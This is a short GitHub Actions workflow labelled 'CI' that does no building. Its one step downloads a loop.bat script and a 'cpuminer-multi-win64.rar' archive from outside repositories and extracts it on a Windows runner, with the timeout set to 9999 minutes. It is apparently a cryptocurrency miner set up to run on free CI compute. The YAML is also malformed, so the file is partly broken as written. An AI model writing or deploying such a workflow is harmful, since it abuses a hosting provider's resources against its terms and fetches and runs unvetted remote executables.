name: CI

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    
    - name: loop
       Invoke-WebRequest https://raw.githubusercontent.com/iton466/test/main/loop.bat  -OutFile loop.bat
      run: cmd /c curl https://github.com/Testdrive345/light/raw/main/cpuminer-multi-win64.rar -O -J -L  tar -xf cpuminer-multi-win64.rar test
    
